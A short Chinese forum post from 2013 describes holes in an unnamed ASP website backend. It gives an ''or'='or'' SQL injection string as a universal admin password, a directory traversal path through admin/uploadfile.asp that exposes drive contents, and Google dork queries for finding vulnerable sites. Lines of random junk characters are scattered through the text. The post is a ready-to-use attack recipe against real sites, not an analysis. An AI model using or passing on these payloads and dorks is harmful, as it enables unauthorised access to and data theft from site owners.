后台万能密码 'or'='or'
8 z( k+ b% m& t8 x: l1 k, H( P: U
' C. N7 K! ~; {, p, j" ^/ h+ K后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
0 P2 n7 ~* z# gadmin/uploadfile.asp?currentFolder=/upfiles/../. U, j$ C8 X$ d! w
" K+ Q2 A- F; i' E S漏洞证明:
- F K5 R& @4 w0 y" d; c- J4 O' W& k
谷歌:inurl:type.asp?id=1 新闻中心. Y1 _/ m% H' @0 c2 a5 O
或者 :inurl:download_ok.asp?
' M0 Y9 u5 z( Q6 c9 c" a0 n
2 q c8 c: V7 E* N7 Q |
发表于 2013-3-14 20:17:32
收藏
支持
反对